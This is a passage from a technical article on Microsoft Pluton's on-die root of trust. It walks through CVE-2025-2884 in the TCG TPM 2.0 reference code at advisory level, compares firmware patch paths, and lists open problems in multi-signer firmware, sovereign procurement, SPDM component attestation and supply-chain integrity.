&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; There is no cryptographic objection to multi-signer RoT firmware. The math has been understood since the FIDO2 multi-credential work, and threshold signatures have been a primitive for decades. The objection is operational: replacing public keys after the chip is in the field requires either fab-time multi-signer or hardware replacement. Section 5 named the choice; this Callout names what makes it hard to undo.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Worked example -- CVE-2025-2884&lt;/h3&gt;
&lt;p&gt;On June 10, 2025, NVD published CVE-2025-2884 [@cve-2025-2884]. The CERT/CC coordination ticket is VU#282450 [@cert-cc-vu-282450]. The vulnerability is an out-of-bounds read in the &lt;code&gt;CryptHmacSign&lt;/code&gt; function of the TCG TPM 2.0 reference implementation, Level 00, Revision 01.83 (March 2024). The CERT/CC document describes the impact: &lt;em&gt;&quot;An authenticated local attacker can send malicious commands to a vulnerable TPM interface, resulting in information disclosure or denial of service of the TPM&quot;&lt;/em&gt; [@cert-cc-vu-282450].&lt;/p&gt;
&lt;p&gt;Crucially for attribution, the CERT/CC ticket is explicit about who reported it and who wrote it up: &lt;em&gt;&quot;Thanks to the reporter, who wishes to remain anonymous. This document was written by Vijay Sarvepalli&quot;&lt;/em&gt; [@cert-cc-vu-282450]. The reporter is anonymous; the CERT/CC document author is Vijay Sarvepalli. Tech press accounts that have attributed the disclosure to Quarkslab are incorrect; the primary CERT/CC record is dispositive.The Quarkslab attribution that some 2025 tech-press accounts use for CVE-2025-2884 is contradicted by the primary CERT/CC record VU#282450, which says verbatim: &lt;em&gt;&quot;Thanks to the reporter, who wishes to remain anonymous. This document was written by Vijay Sarvepalli&quot;&lt;/em&gt; [@cert-cc-vu-282450]. The reporter is anonymous. The document author is Vijay Sarvepalli. This article uses that attribution and only that attribution.&lt;/p&gt;
&lt;p&gt;Multiple downstream products are affected. Intel published Security Advisory SA-01209 [@intel-sa-01209]. Siemens published SSA-628843 [@siemens-ssa-628843]. The libtpms project assigned CVE-2025-49133 [@cve-2025-49133] for its own derivative; the upstream fix landed in libtpms commit &lt;code&gt;04b2d8e9&lt;/code&gt; [@libtpms-commit-04b2d8e9]. The TCG itself coordinated VRT0009 [@tcg-vrt0009-advisory] and a TPM 2.0 Library Specification v1.83 errata (cited via NVD as the verifiable mirror -- the TCG site returns 403 to non-browser User-Agents).&lt;/p&gt;
&lt;p&gt;Why this is the right worked example for Pluton. Garrett&apos;s April 2022 reverse-engineering [@garrett-2022-pluton-rev] documented that the Pluton firmware blob in the AMD Ryzen 6000 BIOS is &lt;em&gt;&quot;firmware for Pluton -- it contains chunks that appear to be the reference TPM2 implementation, and it broadly decompiles as valid ARM code.&quot;&lt;/em&gt; The Pluton firmware blob &lt;em&gt;is&lt;/em&gt; an ARM image derived from the TCG TPM 2.0 reference code. So a &lt;code&gt;CryptHmacSign&lt;/code&gt; OOB read in the TCG reference code &lt;em&gt;was&lt;/em&gt; present in Pluton firmware too, on the silicon Garrett looked at, until the firmware was rebuilt against the patched reference implementation. &lt;em&gt;On-die location did not stop the bug from existing.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;What did matter for outcomes was the &lt;em&gt;dwell time&lt;/em&gt; before the vulnerable code was replaced. The structural change that distinguishes Pluton from a 2014 dTPM is not &quot;where the chip is&quot; but &quot;who can patch it, and how fast.&quot; A discrete TPM with the same bug would wait for the dTPM vendor to push a firmware build, the OEM to package a UEFI capsule, the OEM to test it across its product lines, and the user to install it. Microsoft&apos;s Pluton patch path is the Windows Update channel -- the same channel that already delivers kernel updates to roughly 1.4 billion endpoints on a Patch Tuesday cadence. Section 5 design choice 4 walked the channel-shape change and the no-SLA hedge; this is what makes the channel the security property that matters here.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Realization&lt;/th&gt;
&lt;th&gt;Patch path&lt;/th&gt;
&lt;th&gt;Approximate latency&lt;/th&gt;
&lt;th&gt;Bottleneck&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Discrete TPM&lt;/td&gt;
&lt;td&gt;dTPM vendor build -&amp;gt; OEM UEFI capsule&lt;/td&gt;
&lt;td&gt;Quarters to years&lt;/td&gt;
&lt;td&gt;OEM fleet test + per-OEM rollout&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intel PTT (CSME)&lt;/td&gt;
&lt;td&gt;Intel ME firmware -&amp;gt; OEM UEFI capsule&lt;/td&gt;
&lt;td&gt;Months to quarters&lt;/td&gt;
&lt;td&gt;OEM UEFI capsule path (TPM-Fail lesson)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMD fTPM (PSP)&lt;/td&gt;
&lt;td&gt;AMD AGESA -&amp;gt; OEM UEFI capsule&lt;/td&gt;
&lt;td&gt;Months to quarters&lt;/td&gt;
&lt;td&gt;Same OEM UEFI capsule path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pluton-on-PC&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Microsoft signs -&amp;gt; Windows Update&lt;/td&gt;
&lt;td&gt;Days to weeks (no published SLA)&lt;/td&gt;
&lt;td&gt;Microsoft signing key + WU infrastructure&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart TD
    Ref[TCG TPM 2.0 reference&lt;br /&gt;Level 00 Rev 01.83&lt;br /&gt;March 2024]
    CVE[CVE-2025-2884&lt;br /&gt;CryptHmacSign OOB read&lt;br /&gt;NVD published 2025-06-10]
    Pluton[Pluton firmware&lt;br /&gt;ARM blob&lt;br /&gt;per Garrett 2022]
    Intel[Intel SA-01209]
    Siemens[Siemens SSA-628843]
    Libtpms[libtpms&lt;br /&gt;CVE-2025-49133&lt;br /&gt;commit 04b2d8e9]
    TCG[TCG VRT0009&lt;br /&gt;+ TPM 2.0 v1.83 errata]
    Ref --&amp;gt; CVE
    CVE --&amp;gt; Pluton
    CVE --&amp;gt; Intel
    CVE --&amp;gt; Siemens
    CVE --&amp;gt; Libtpms
    CVE --&amp;gt; TCG
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Pluton&apos;s structural advantage is the patch path, not the silicon location. CVE-2025-2884 demonstrates that on-die location does not stop a TCG-reference-code bug from existing on a Pluton chip. What changes between a 2014 dTPM and a 2025 Pluton is not &quot;where the chip is&quot; but &quot;who can patch it, and how fast.&quot; On-die is necessary but not sufficient. The breakthrough is the update path. The cost of the update path is the political question section 1 promised.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If single-signer revocation is impossible, what would multi-signer Pluton look like? And what other open problems does this design choice leave unsolved?&lt;/p&gt;
&lt;h2&gt;9. Open problems Pluton has named but not solved&lt;/h2&gt;
&lt;p&gt;Five concrete open problems sit in front of any 2026 reader of the Pluton design. Each is mapped below to the closest existing partial result. None has a public solution.&lt;/p&gt;
&lt;h3&gt;Open problem 1 -- Multi-signer firmware for on-die client RoTs&lt;/h3&gt;
&lt;p&gt;No public proposal exists for multi-signer Pluton on a Windows client. Caliptra moves the signer to the integrating chip vendor [@caliptra-github], so the count of signers per &lt;em&gt;chip&lt;/em&gt; remains one even when the count per &lt;em&gt;deployment&lt;/em&gt; is many. There is no public proposal for two simultaneous signers on a single client RoT (e.g., Microsoft &lt;em&gt;and&lt;/em&gt; a sovereign signer; or AMD &lt;em&gt;and&lt;/em&gt; Microsoft for a Pluton-on-AMD chip). The closest existing analogues live elsewhere -- IETF KEYTRANS for transparency-logged keys [@ietf-keytrans-wg], HSM-cluster split-signing for operational continuity -- but none has a hardware-RoT counterpart that has shipped. The unresolved engineering question, named in the prior article&apos;s section 8, is whether multi-signer can be added without losing the timely-update property that motivated Pluton in the first place.The IETF KEYTRANS working group [@ietf-keytrans-wg] is the closest active venue for the multi-signer thread, although KEYTRANS is concerned with end-user identity-key transparency rather than firmware-signing keys. The transparency-log primitive is the same (a Merkle tree of signed claims, auditable by independent verifiers); the hardware-RoT integration is missing. A reader interested in the multi-signer thread should track KEYTRANS and the OpenTitan / Caliptra governance discussions in parallel.&lt;/p&gt;
&lt;h3&gt;Open problem 2 -- Regulatory jurisdiction of single-signer firmware&lt;/h3&gt;
&lt;p&gt;Pluton&apos;s signing key is, in effect, a US export-controlled artifact. The EU Cyber Resilience Act entered into force on December 10, 2024, with the bulk of its security obligations applying from December 11, 2027 and reporting obligations applying from September 11, 2026 [@eu-commission-cra]; from the 2027 date it will require demonstrable security properties for products with digital elements, without specifying &lt;em&gt;who&lt;/em&gt; the signer must be. Sovereign fleets -- the German Federal Office for Information Security (BSI), Singapore, Switzerland -- have varying postures on whether a non-domestic RoT is acceptable. Read in 2026, the Dell and Lenovo statements of March 2022 [@register-2022-pluton] [@pcworld-2022-pluton] are the first public push-back along this axis. The procurement debate is not technical; it is jurisdictional. There is no current proposal for a Pluton variant that satisfies a non-US sovereign procurement requirement.&lt;/p&gt;

The EU Cyber Resilience Act entered into force on December 10, 2024 [@eu-commission-cra]. Reporting obligations apply from September 11, 2026; the main security obligations apply from December 11, 2027 [@eu-commission-cra]. CRA does not name signers; it requires demonstrable security properties, vulnerability handling, and update channels for products sold into the EU. A single-signer foreign-rooted RoT can satisfy CRA. Whether it satisfies *sovereign* procurement requirements is a separate question.&lt;p&gt;The German BSI&apos;s Common Criteria PP-0084 protection profile [@bsi-pp-0084] (used historically for Infineon SLB 9670 / 9672 dTPMs) bakes in expectations of the chip-supplier governance that a US-rooted Pluton does not satisfy without a parallel certification path. Switzerland&apos;s federal IT procurement, Singapore&apos;s CSA, and a number of EU member-state ministries take comparable positions. None of these is a formal ban on Pluton; all of them are formal preferences that procurement officers must navigate.&lt;/p&gt;
&lt;p&gt;The architectural fix -- a sovereign signing-root variant of Pluton -- has not been publicly proposed by Microsoft. The economic incentives for such a variant are not obviously favourable: every additional signer adds operational cost to the Windows Update path that Pluton&apos;s design specifically optimises. The procurement market is, as of 2026, deciding both ways, and the 2022 Dell statement is the most-cited public datapoint of a vendor declining to take the bet.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Open problem 3 -- SPDM 1.3 component attestation on PC&lt;/h3&gt;
&lt;p&gt;Pluton attests the host SoC. It does not yet attest individual components -- NICs, NVMe SSDs, PCIe accelerators -- on Windows clients. The DMTF&apos;s Security Protocol and Data Model (DSP0274) is the wire protocol for component-to-component attestation: a publication cadence of 1.3.0 in June 2023, 1.3.2 in September 2024, and 1.3.3 in December 2025 [@dmtf-dsp0274]. The Caliptra MCU project&apos;s Rust SPDM responder design page is the most explicit public reference for what an SPDM 1.3 endpoint looks like inside an on-die RoT: SPDM is &lt;em&gt;&quot;a protocol designed to ensure secure communication between hardware components by focusing on mutual authentication and the establishment of secure channels over potentially insecure media... using X.509v3 certificates&quot;&lt;/em&gt; [@caliptra-mcu-spdm], with a fixed message inventory (&lt;code&gt;GetVersion&lt;/code&gt;, &lt;code&gt;GetCapabilities&lt;/code&gt;, &lt;code&gt;NegotiateAlgorithms&lt;/code&gt;, &lt;code&gt;GetDigests&lt;/code&gt;, &lt;code&gt;GetCertificate&lt;/code&gt;, &lt;code&gt;Challenge&lt;/code&gt;, &lt;code&gt;GetMeasurements&lt;/code&gt;, &lt;code&gt;KeyExchange&lt;/code&gt;, &lt;code&gt;Finish&lt;/code&gt;) carried over an MCTP transport binding. Caliptra 2.0&apos;s RTL design freeze in October 2024 [@caliptra-ocp-2024-news] commits SPDM as part of the Caliptra Subsystem reference stack: &lt;em&gt;&quot;Reference Stack: MCTP PLDM, SPDM&quot;&lt;/em&gt; [@caliptra-ocp-2024-news]. That is the server-side commitment.&lt;/p&gt;
&lt;p&gt;The PC-client equivalent is not on the public record as of May 2026. Microsoft Learn&apos;s Pluton page does not mention SPDM, DSP0274, MCTP, or component attestation [@ms-learn-pluton]. There is no Microsoft-published Windows feature or Pluton-firmware milestone that names &quot;SPDM responder&quot; or &quot;component attestation on PC&quot; as a roadmap deliverable. The architectural question -- whether Pluton becomes the platform&apos;s SPDM responder, whether each component (NVMe controller, Wi-Fi card) is its own responder and Pluton aggregates the evidence, or whether Windows Defender System Guard owns the Windows-side appraiser -- is not answered by any published Microsoft document on the public record as of May 2026. The closest existing reference design lives in &lt;code&gt;chipsalliance/caliptra-mcu-sw&lt;/code&gt; (Rust SPDM responder, X.509-anchored mutual auth), and the most likely standards venues for a PC-client profile are the DMTF SPDM WG (the wire protocol owner) and the OCP Security WG (the appraisal-framework owner). Until Microsoft publishes a Windows-feature surface that owns the SPDM responder on PC, &quot;Pluton attests the host SoC, period&quot; is the article&apos;s honest description of the 2026 state.&lt;/p&gt;
&lt;h3&gt;Open problem 4 -- Pluton-Caliptra interoperation&lt;/h3&gt;
&lt;p&gt;A Pluton-rooted client should, in principle, be able to attest to a Caliptra-rooted server in a single end-to-end protocol with both roots of trust visible in the resulting evidence chain. The wire-protocol candidates exist and are largely standardised. What is missing is the &lt;em&gt;composite-attestation profile&lt;/em&gt; that wires them into a single client-to-server flow.&lt;/p&gt;
&lt;p&gt;The candidate stack as of May 2026 lives across three SDOs and one OCP project. The DMTF owns SPDM 1.3 for component-to-component attestation [@dmtf-dsp0274] [@caliptra-mcu-spdm]. The IETF Remote Attestation Procedures (RATS) Working Group owns the architectural primitives for what an evidence-and-results message &lt;em&gt;contains&lt;/em&gt;: RFC 9711 (April 2025, Standards Track) is the Entity Attestation Token (EAT), a CBOR Web Token (CWT) or JSON Web Token (JWT) form for &lt;em&gt;&quot;an attested claims set that describes the state and characteristics of an entity&quot;&lt;/em&gt; [@ietf-rfc9711]; &lt;code&gt;draft-ietf-rats-corim-10&lt;/code&gt; (in WG Last Call as of March 2026) is the Concise Reference Integrity Manifest, the appraisal-time profile for &lt;em&gt;&quot;Endorsements and Reference Values in CBOR format&quot;&lt;/em&gt; [@ietf-corim]; &lt;code&gt;draft-ietf-rats-msg-wrap-23&lt;/code&gt; (in the RFC Editor queue since December 2025) is the Conceptual Message Wrapper, a CBOR-tag / JWT / CWT / X.509-extension envelope for &lt;em&gt;composing&lt;/em&gt; evidence, attestation results, endorsements, and reference values across protocols [@ietf-msg-wrap]. The full RATS WG document inventory at &lt;code&gt;datatracker.ietf.org/wg/rats/documents/&lt;/code&gt; shows additional active drafts on multi-verifier composition, posture-assessment, EAR (an evidence-appraisal-results profile), and PKIX key attestation [@ietf-rats-wg-docs]. The OCP Security WG owns the third-party appraisal framework: OCP S.A.F.E. v2.0 (March 2026) added explicit CoRIM SFR support and is the public mechanism by which a fleet operator certifies that a vendor&apos;s firmware-appraisal evidence has been independently audited [@ocp-safe-framework]. Caliptra 2.0&apos;s reference stack already wires SPDM, MCTP, and PLDM [@caliptra-ocp-2024-news]; the Caliptra MCU Rust responder shows the SPDM endpoint shape [@caliptra-mcu-spdm].&lt;/p&gt;
&lt;p&gt;What is &lt;em&gt;missing&lt;/em&gt; is a single published profile that walks the chain end to end: a Pluton-rooted Windows client emits a &lt;code&gt;Get-Tpm&lt;/code&gt;-derived attestation (Pluton acting as evidence producer); the network carries CMW-wrapped evidence with a CoRIM endorsement set the verifier consumes; the verifier emits an EAT-formatted attestation result; a Caliptra-rooted server consumes the result and gates fleet membership. Each leg has a draft. No public SDO document binds them into a single Pluton-Caliptra composite-attestation profile with reference implementations on both ends. The natural venue is a joint DMTF SPDM WG and OCP Security WG profile, with IETF RATS as the architectural reference; the natural reference implementation pair is &lt;code&gt;chipsalliance/caliptra-mcu-sw&lt;/code&gt; on the responder side and a Windows-feature surface (which Microsoft has not named publicly) on the client side. Until that joint profile exists and ships reference implementations, Pluton-Caliptra interoperation in 2026 is two roots-of-trust deployed, with no published end-to-end protocol that visibly carries both signatures into a single evidence chain.&lt;/p&gt;
&lt;h3&gt;Open problem 5 -- Supply-chain integrity beyond firmware signing&lt;/h3&gt;
&lt;p&gt;The Pluton signing root protects firmware integrity &lt;em&gt;after&lt;/em&gt; the chip ships. Listing the supply-chain steps in chronological order makes the residual trust gap concrete: (1) the IP-licensing handshake from Microsoft to AMD / Intel / Qualcomm; (2) tape-out and process-design-kit integration at TSMC; (3) wafer fabrication; (4) per-vendor package assembly; (5) OEM motherboard integration; (6) OEM firmware integration (BIOS / UEFI vendor code that surrounds the Pluton block); (7) retail distribution. None of these steps is presently attested by Pluton itself; the on-die signing root is &lt;em&gt;provisioned&lt;/em&gt; during silicon manufacture (the tape-out and fabrication steps) and &lt;em&gt;exercised&lt;/em&gt; when signed Pluton firmware is loaded and verified from OEM firmware integration onward, but the licensing, assembly, and board-integration steps around it are out of band of the chip&apos;s RoT.&lt;/p&gt;
&lt;p&gt;The closest existing partial answer is a layered combination of three primitives. First, DICE -- TCG&apos;s Device Identifier Composition Engine -- gives every component a &lt;em&gt;Hardware Root of Trust (HRoT) which uniquely identifies the component and attests component firmware&lt;/em&gt; [@tcg-dice], anchored by a per-die Unique Device Secret (UDS) that derives a Compound Device Identifier (CDI) per layer; the Open Profile for DICE v2.6 [@open-dice] is the reference profile and explicitly cites the TCG normative parent. DICE answers step 4-5 (per-package and per-board identity) provided the integrator provisions a UDS on the die. Second, SPDM 1.3 [@dmtf-dsp0274] [@caliptra-mcu-spdm] is the wire protocol that surfaces those DICE identities to a verifier at runtime: a per-component SPDM responder (carried over MCTP / PLDM in Caliptra 2.0&apos;s stack [@caliptra-ocp-2024-news]) emits a measurement set tied to its CDI. Third, OCP S.A.F.E. (Security Appraisal Framework and Enablement) v2.0 [@ocp-safe-framework] is the third-party-audit framework that lets a fleet operator certify that a Device Vendor&apos;s firmware was assessed by a Security Review Provider; the v2.0 March 2026 revision explicitly added CoRIM SFR support, wiring S.A.F.E. into the IETF RATS appraisal stack [@ietf-corim]. Together, DICE + SPDM + S.A.F.E. answer &quot;is each component what its vendor said it was, and has the firmware been independently appraised?&quot;&lt;/p&gt;
&lt;p&gt;What is &lt;em&gt;not&lt;/em&gt; built is the verifier infrastructure that consumes that evidence end to end. There is no public per-component-EK transparency log analogous to Certificate Transparency for the web PKI; there is no Pluton-rooted client-side appraiser that consumes per-component SPDM evidence and gates Windows boot on it; there is no shipping fleet-side hardware-bill-of-materials (HBOM) audit pipeline that ingests S.A.F.E. reports and Caliptra-rooted server attestations together. The supply-chain trust is &lt;em&gt;named&lt;/em&gt; by DICE + SPDM + S.A.F.E.; it is not &lt;em&gt;operationalised&lt;/em&gt; end to end on a 2026 Windows 11 client. The honest framing is: Pluton&apos;s signing root closes step 6 and step 7; DICE + SPDM + S.A.F.E. are the public standards that, if implemented in the Windows feature stack, would close steps 4-5; steps 1-3 (IP licensing, tape-out, wafer) remain out of band of any of the public standards above.&lt;/p&gt;
&lt;h3&gt;The 10-property scoreboard for an ideal client-PC on-die RoT&lt;/h3&gt;
&lt;p&gt;Five open problems converge onto a single scoreboard. This article&apos;s SOTA review enumerates ten properties an ideal client-PC on-die Root of Trust in 2026 would satisfy (expanding the prior article&apos;s six TPM-ideal properties [@prior-tpm-in-windows] with multi-signer governance, public RTL, native PQC, and component attestation): (1) on-die location with no off-package bus; (2) an isolated TEE shared with nothing else; (3) memory-protected DRAM with AES + authenticated + anti-replay protection; (4) OS-channel firmware updates; (5) memory-safe firmware language; (6) multi-signer firmware authentication; (7) public RTL and verification flow; (8) native post-quantum primitives (ML-DSA, ML-KEM); (9) component attestation across PCIe / NVMe / NIC via SPDM 1.3; (10) high-assurance certification depth (Common Criteria EAL4+ and FIPS 140-3). No shipping method satisfies all ten; the matrix below shows where each design sits.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Pluton-on-PC 2026&lt;/th&gt;
&lt;th&gt;Apple SEP (A14/M1+)&lt;/th&gt;
&lt;th&gt;OpenTitan (Earl Grey / Darjeeling)&lt;/th&gt;
&lt;th&gt;Caliptra 2.0 (RTL freeze Oct 2024)&lt;/th&gt;
&lt;th&gt;Cerberus (current production)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1. On-die, no bus&lt;/td&gt;
&lt;td&gt;Yes [@ms-pluton-blog-2020]&lt;/td&gt;
&lt;td&gt;Yes [@apple-sep]&lt;/td&gt;
&lt;td&gt;Discrete or in-package&lt;/td&gt;
&lt;td&gt;Yes [@caliptra-github]&lt;/td&gt;
&lt;td&gt;No (discrete on BMC)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2. Isolated TEE&lt;/td&gt;
&lt;td&gt;Yes (dedicated)&lt;/td&gt;
&lt;td&gt;Yes [@apple-sep]&lt;/td&gt;
&lt;td&gt;Yes (whole chip)&lt;/td&gt;
&lt;td&gt;Yes (RTM block)&lt;/td&gt;
&lt;td&gt;Yes (whole chip)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3. AES + authenticated + anti-replay DRAM&lt;/td&gt;
&lt;td&gt;Not on public record&lt;/td&gt;
&lt;td&gt;Yes (A14/M1+) [@apple-sep]&lt;/td&gt;
&lt;td&gt;Limited (chip-internal SRAM)&lt;/td&gt;
&lt;td&gt;N/A (no DRAM responder role)&lt;/td&gt;
&lt;td&gt;N/A (server BMC)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4. OS-channel firmware updates&lt;/td&gt;
&lt;td&gt;Yes (Windows Update) [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;Yes (iOS / macOS) [@apple-sep]&lt;/td&gt;
&lt;td&gt;Project-managed&lt;/td&gt;
&lt;td&gt;Server platform updates&lt;/td&gt;
&lt;td&gt;OEM / operator updates&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5. Memory-safe firmware&lt;/td&gt;
&lt;td&gt;Yes (Rust 2024+) [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;Apple-customised L4 [@apple-sep]&lt;/td&gt;
&lt;td&gt;Rust runtime in OpenTitan codebase&lt;/td&gt;
&lt;td&gt;Rust [@caliptra-github] [@caliptra-mcu-spdm]&lt;/td&gt;
&lt;td&gt;C / C++ [@azure-cerberus-github]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6. Multi-signer&lt;/td&gt;
&lt;td&gt;No (Microsoft only)&lt;/td&gt;
&lt;td&gt;No (Apple only)&lt;/td&gt;
&lt;td&gt;No (per-deployment)&lt;/td&gt;
&lt;td&gt;Multi-vendor by deployment, single per chip [@caliptra-github]&lt;/td&gt;
&lt;td&gt;Per-deployment signer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7. Public RTL and verification&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes [@opentitan-home] [@opentitan-commercial]&lt;/td&gt;
&lt;td&gt;Yes [@caliptra-github]&lt;/td&gt;
&lt;td&gt;Yes (reference impl) [@azure-cerberus-github]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8. Native PQC (ML-DSA, ML-KEM)&lt;/td&gt;
&lt;td&gt;No public commitment date&lt;/td&gt;
&lt;td&gt;No public commitment date&lt;/td&gt;
&lt;td&gt;On roadmap [@opentitan-home]&lt;/td&gt;
&lt;td&gt;Yes (RTL freeze incl. Dilithium + Kyber) [@caliptra-ocp-2024-news]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9. Component attestation (SPDM 1.3)&lt;/td&gt;
&lt;td&gt;No (open problem 3)&lt;/td&gt;
&lt;td&gt;Apple-private equivalents&lt;/td&gt;
&lt;td&gt;Not yet&lt;/td&gt;
&lt;td&gt;Yes (Reference Stack: MCTP PLDM, SPDM) [@caliptra-ocp-2024-news] [@caliptra-mcu-spdm]&lt;/td&gt;
&lt;td&gt;NIST SP 800-193 framing [@ms-learn-cerberus]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10. EAL4+ and FIPS 140-3&lt;/td&gt;
&lt;td&gt;FIPS 140-3 L2 (Pluton ROM, CMVP #4880); no public EAL4+ [@bsi-slb-9670-cc]&lt;/td&gt;
&lt;td&gt;Not pursued for SEP&lt;/td&gt;
&lt;td&gt;In assessment&lt;/td&gt;
&lt;td&gt;Not pursued&lt;/td&gt;
&lt;td&gt;Some certifications via OEM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Properties satisfied&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4 (1, 2, 4, 5)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4 (1, 2, 3, 4)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;2 (5, 7)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;3 (5, 7, 8) -- on track for 9&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;1-2 (7 + partial 9)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The matrix says two things at once. First, no shipping on-die RoT in 2026 satisfies more than four of the ten properties; the scoreboard is sparse on purpose. Second, the closest &lt;em&gt;trajectory&lt;/em&gt; to the ten-property ideal is not any single design; it is the union of Pluton&apos;s properties (1, 2, 4, 5), Caliptra&apos;s open RTL and PQC commitments (7, 8, 9), and OpenTitan&apos;s open RTL (7). A hypothetical Pluton variant that adopted Caliptra-style multi-signer governance, OpenTitan-style RTL transparency, and the Caliptra 2.0 SPDM responder reference stack would satisfy 1, 2, 4, 5, 6, 7, 8, 9 -- eight of the ten -- with high-assurance certification (10) the residual procurement question. That hypothetical Pluton has not been publicly proposed by Microsoft. It is, however, the design the matrix names as the destination if all five open problems above were closed.&lt;/p&gt;
&lt;h3&gt;The shape of the unanswered question&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Open problem&lt;/th&gt;
&lt;th&gt;Why it matters&lt;/th&gt;
&lt;th&gt;Closest existing partial result&lt;/th&gt;
&lt;th&gt;Outstanding gap&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Multi-signer client RoT&lt;/td&gt;
&lt;td&gt;Single-signer revocation impossibility&lt;/td&gt;
&lt;td&gt;Caliptra (multi-vendor by deployment, single-signer per chip) [@caliptra-github]&lt;/td&gt;
&lt;td&gt;No two-signer-per-chip proposal for client&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Regulatory jurisdiction&lt;/td&gt;
&lt;td&gt;Sovereign procurement, EU CRA (in force Dec 10 2024, reporting from Sep 11 2026, main obligations from Dec 11 2027) [@eu-commission-cra]&lt;/td&gt;
&lt;td&gt;March 2022 Dell / Lenovo posture [@register-2022-pluton] [@pcworld-2022-pluton]&lt;/td&gt;
&lt;td&gt;No sovereign Pluton variant&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPDM 1.3 on PC&lt;/td&gt;
&lt;td&gt;Component attestation beyond the SoC&lt;/td&gt;
&lt;td&gt;Caliptra 2.0 reference stack with SPDM [@caliptra-ocp-2024-news] [@caliptra-mcu-spdm]&lt;/td&gt;
&lt;td&gt;No PC-client SPDM responder named on Microsoft Learn&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pluton-Caliptra interop&lt;/td&gt;
&lt;td&gt;Composite client-to-server attestation&lt;/td&gt;
&lt;td&gt;RATS EAT [@ietf-rfc9711] + CoRIM [@ietf-corim] + CMW [@ietf-msg-wrap] + S.A.F.E. [@ocp-safe-framework]&lt;/td&gt;
&lt;td&gt;No joint DMTF / OCP / RATS profile binding the chain end to end&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supply-chain integrity beyond firmware signing&lt;/td&gt;
&lt;td&gt;Pre-ship trust (steps 1-5 of the chain)&lt;/td&gt;
&lt;td&gt;DICE [@tcg-dice] [@open-dice] + SPDM [@dmtf-dsp0274] + S.A.F.E. [@ocp-safe-framework]&lt;/td&gt;
&lt;td&gt;Verifier infrastructure (per-component-EK transparency, HBOM appraiser) not built&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;All five share the same shape. Pluton has &lt;em&gt;narrowed&lt;/em&gt; but not eliminated structural classes of trust. On-die narrowed but did not eliminate the silicon supply chain trust. Microsoft-rooted firmware servicing narrowed but did not eliminate the firmware-signing trust. Component attestation, when it ships on PC, will narrow but not eliminate the per-component supply-chain trust. Each Pluton design choice trades one trust for another; the residual trusts are the ones the article cannot answer technically and must label politically.&lt;/p&gt;
&lt;p&gt;On Monday morning, what does the Windows engineer reading this actually do?&lt;/p&gt;
&lt;h2&gt;10. The Pluton checklist for 2026&lt;/h2&gt;
&lt;p&gt;Five questions. Each has a one-paragraph answer and a verifiable command or check. The reader who skipped sections 6 and 8 will still avoid the most expensive mistake -- counting &quot;Pluton present&quot; as &quot;Pluton enabled.&quot;&lt;/p&gt;
&lt;h3&gt;Q1 -- Is Pluton present on this device?&lt;/h3&gt;
